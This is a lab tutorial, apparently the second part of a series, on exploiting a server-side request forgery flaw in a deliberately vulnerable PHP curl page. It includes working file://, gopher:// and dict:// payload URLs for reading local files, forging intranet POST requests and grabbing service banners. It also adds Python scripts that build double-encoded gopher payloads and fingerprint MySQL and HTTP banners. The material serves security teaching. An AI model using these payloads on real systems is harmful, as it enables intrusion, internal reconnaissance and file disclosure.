0x01 Overview
Part one covered the general use of SSRF: probing the network over HTTP and attacking Redis inside the intranet. This part extends that by exploiting the same SSRF vulnerability through the file, dict and gopher protocols.
0x02 Experimental environment
Attacker: 192.168.220.140
Target host with the SSRF vulnerability: 192.168.220.143
Intranet host to be attacked: 192.168.220.144
The page with the SSRF vulnerability is http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php; its code is as follows:

```php
<?php
// create a new cURL resource
$ch = curl_init();

// set URL and other appropriate options.
// The user-supplied value goes into CURLOPT_URL unchanged and no
// CURLOPT_PROTOCOLS restriction is set, so every scheme libcurl was built
// with (http, file, dict, gopher, ...) is accepted: this is the SSRF.
curl_setopt($ch, CURLOPT_URL, $_GET['url']);
curl_setopt($ch, CURLOPT_HEADER, false);

// grab URL and pass it to the browser
curl_exec($ch);

// close cURL resource, and free up system resources
curl_close($ch);
?>
```
[1] Reading files with the file protocol
Visiting http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php?url=file:///C:/WINDOWS/win.ini reads the file successfully.
[2] Sending POST requests to intranet systems with the gopher protocol
Suppose there is an intranet system (http://192.168.220.144/bWAPP/post.php) that accepts POST requests, with the following code:

```php
<html>
<head><title>post</title></head>
<body>
<?php echo $_REQUEST['cmd']; ?>
</body>
</html>
```
With the curl command and the gopher protocol, a POST request to http://192.168.220.144/bWAPP/post.php can be made directly, for example by running the following command:
curl 'gopher://192.168.220.144:80/_POST%20/bWAPP/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.144%250d%250aUser-Agent:%20curl/7.21.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=aaaaaaaa'
Checking the system log on 192.168.220.144 shows one more POST request, recorded as coming from 192.168.220.142.
The SSRF vulnerability can likewise be used with the gopher protocol to send POST requests to the intranet system. First check phpinfo to confirm that curl is enabled and note its version: here it is 7.38.0. (With 7.21.0 at first the attack could not be reproduced, which is a pitfall. If the version is too low, raise the PHP version in phpstudy on Windows, or simply update curl on Linux.)
Then access the following URL. Note the double encoding: the PHP page URL-decodes the url parameter once, and curl decodes the gopher selector once more, so %250d%250a reaches the wire as CRLF:
http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php?url=gopher://192.168.220.144:80/_POST%20/bWAPP/post.php%20HTTP/1.1%250d%250aHost:%20192.168.220.144%250d%250aUser-Agent:%20curl/7.21.0%250d%250aAccept:%20*/*%250d%250aContent-Type:%20application/x-www-form-urlencoded%250d%250a%250d%250acmd=qqq
Checking the system log on 192.168.220.144 shows one more POST request, this time from 192.168.220.143:
A packet capture in Ethereal shows that 192.168.220.143 really did send a POST request to 192.168.220.144; 143 acted as the springboard (pivot) host.
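The gopher URL above was assembled by hand. As an added example that is not code from the original post, the following Python script builds the same POST request from its parts, wraps it for curl and then for the vulnerable page, and simulates the two decode steps so the bytes that reach the intranet host can be checked. Hosts, paths and the cmd field are the lab values from the post; the Content-Length header is an addition (the post's payload omits it, and an HTTP/1.1 server treats a request without Content-Length or Transfer-Encoding as having no body).

```python
"""
Added example (not code from the original post): build the gopher:// payload
that makes the curl-based SSRF page send an HTTP POST to an intranet host,
and simulate the two decode steps it passes through.

Why two percent-encoding layers in the SSRF case:
  1. the vulnerable PHP page URL-decodes $_GET['url'] once, and
  2. libcurl drops "/" plus the one-character item type from the gopher path
     and URL-decodes the rest (the selector) once more before sending it.
So CRLF is written as %250D%250A in the browser URL, becomes %0D%0A for
curl, and reaches the wire as \r\n (curl appends its own CRLF at the end).
Hosts, paths and the form field name are the lab values from the post.
"""
from urllib.parse import quote, unquote, unquote_plus, urlencode

SSRF_PAGE = "http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php"
TARGET_HOST, TARGET_PORT, TARGET_PATH = "192.168.220.144", 80, "/bWAPP/post.php"


def build_http_post(host, path, form, ua="curl/7.21.0"):
    """Raw HTTP/1.1 POST request (CRLF line endings) for the intranet target.
    Content-Length is included so the server actually reads the form body."""
    body = urlencode(form)
    lines = [
        f"POST {path} HTTP/1.1",
        f"Host: {host}",
        f"User-Agent: {ua}",
        "Accept: */*",
        "Content-Type: application/x-www-form-urlencoded",
        f"Content-Length: {len(body)}",
        "",
        body,
    ]
    return "\r\n".join(lines)


def gopher_url(host, port, raw_request):
    """gopher:// URL that makes libcurl write raw_request to host:port.
    '_' is the item type byte curl strips; everything after it is
    percent-encoded exactly once, for libcurl's own decode."""
    selector = quote(raw_request, safe="")
    return f"gopher://{host}:{port}/_{selector}"


def ssrf_url(page, inner_url):
    """Wrap inner_url in the vulnerable page's url= parameter. Encoding it
    again turns every '%' into '%25', so PHP's decode of $_GET['url']
    restores exactly the gopher URL curl should receive."""
    return f"{page}?url={quote(inner_url, safe=':/')}"


def wire_bytes(full_url):
    """Simulate browser URL -> PHP $_GET decode -> libcurl selector decode.
    Returns the bytes the intranet host receives, including curl's CRLF."""
    param = full_url.split("?url=", 1)[1]
    inner = unquote_plus(param)          # PHP: $_GET['url'] ('+' becomes space)
    selector = inner.split("/", 3)[3]    # gopher://host:port/<type><selector>
    return unquote(selector[1:]).encode() + b"\r\n"


if __name__ == "__main__":
    raw = build_http_post(TARGET_HOST, TARGET_PATH, {"cmd": "qqq"})
    inner = gopher_url(TARGET_HOST, TARGET_PORT, raw)
    full = ssrf_url(SSRF_PAGE, inner)
    print("direct curl:", inner)
    print("via SSRF   :", full)
    print("on the wire:", wire_bytes(full))
```

Running the script prints the single-encoded URL for direct curl use, the double-encoded URL for the SSRF page, and the decoded request; comparing the last line with the raw request is the quickest way to find an encoding-layer mistake before touching the target.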
The attack process is as follows:
[3] Reading the versions of services running on the target's ports through the dict protocol
With dict:// curl opens a TCP connection to the given port and relays whatever the service answers, so services that announce themselves on connect give away their banner and version. Visit:
http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php?url=dict://192.168.220.143:3306
Or visit:
http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php?url=dict://192.168.220.144:80
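As an added example that is not code from the original post, the following Python script generates dict:// probe URLs for a list of ports on the SSRF page and fingerprints the raw replies that come back. It goes a step beyond the post by parsing the MySQL greeting (the 3306 case) and the MySQL error packet a server returns when the SSRF host is not allowed to connect, and by pulling the Server header out of an HTTP reply (the port 80 case). The sample replies are constructed for the example; the version string and Server value in them are made up, not observed.

```python
"""
Added example (not code from the original post): dict:// port probing through
the SSRF page, plus a fingerprinter for what the probe relays back. The
sample replies at the bottom are constructed, not captured traffic.
"""
from urllib.parse import quote

SSRF_PAGE = "http://192.168.220.143:8888/zhan/ssrf/ssrf_demo.php"


def dict_probe_urls(target, ports):
    """One SSRF URL per port, e.g. ...?url=dict://192.168.220.144:80"""
    urls = []
    for port in ports:
        inner = f"dict://{target}:{port}"
        urls.append(f"{SSRF_PAGE}?url={quote(inner, safe=':/')}")
    return urls


def mysql_packet(payload, seq=0):
    """MySQL wire framing: 3-byte little-endian length, 1-byte sequence id."""
    return len(payload).to_bytes(3, "little") + bytes([seq]) + payload


def parse_mysql_greeting(data):
    """Parse a protocol-10 handshake, the first packet a MySQL server sends.
    After the 4-byte header: protocol version (0x0a), NUL-terminated server
    version string, 4-byte connection id, then the auth data.
    Returns (server_version, connection_id), or None if it is not one."""
    if len(data) < 5 or data[3] != 0 or data[4] != 0x0A:
        return None
    end = data.find(b"\x00", 5)
    if end < 0 or len(data) < end + 5:
        return None
    version = data[5:end].decode("ascii", "replace")
    conn_id = int.from_bytes(data[end + 1:end + 5], "little")
    return version, conn_id


def fingerprint(data):
    """Classify a raw reply relayed by a dict:// probe."""
    greeting = parse_mysql_greeting(data)
    if greeting:
        return f"mysql {greeting[0]} (connection id {greeting[1]})"
    if len(data) >= 7 and data[3] == 0 and data[4] == 0xFF:
        # MySQL ERR packet: 0xff, 2-byte error code, optional '#' plus a
        # 5-byte SQL state, then the message. Sent instead of a greeting
        # when the connecting host (here the SSRF server) is not allowed in.
        msg = data[7:].decode("ascii", "replace")
        if msg.startswith("#"):
            msg = msg[6:]
        return f"mysql (error: {msg})"
    if data.startswith(b"HTTP/"):
        lines = data.split(b"\r\n")
        status = lines[0].decode("ascii", "replace")
        server = "not disclosed"
        for line in lines[1:]:
            if line.lower().startswith(b"server:"):
                server = line.split(b":", 1)[1].strip().decode("ascii", "replace")
        return f"http ({status}), server {server}"
    return "unrecognised banner"


# Constructed sample replies (not captured traffic; values are made up).
SAMPLE_MYSQL_GREETING = mysql_packet(
    b"\x0a" + b"5.5.53-0+deb8u1\x00" + (42).to_bytes(4, "little")
    + b"abcdefgh\x00" + b"\xff\xf7" + b"\x08" + b"\x02\x00" + b"\x0f\x80"
    + b"\x15" + b"\x00" * 10 + b"ijklmnopqrst\x00" + b"mysql_native_password\x00"
)
SAMPLE_MYSQL_ERR = mysql_packet(
    b"\xff\x6a\x04Host '192.168.220.143' is not allowed to connect to this MySQL server"
)
SAMPLE_HTTP_400 = (
    b"HTTP/1.1 400 Bad Request\r\nServer: Apache/2.4.10 (Debian)\r\n"
    b"Content-Length: 0\r\nConnection: close\r\n\r\n"
)

if __name__ == "__main__":
    for url in dict_probe_urls("192.168.220.144", [80, 3306]):
        print(url)
    for sample in (SAMPLE_MYSQL_GREETING, SAMPLE_MYSQL_ERR, SAMPLE_HTTP_400):
        print(fingerprint(sample))
```

In practice the body returned by ssrf_demo.php for each probe URL is saved and passed to fingerprint(); an empty body usually means the port is closed or the service waits for the client to speak first, which dict:// with a bare host:port does not do for it.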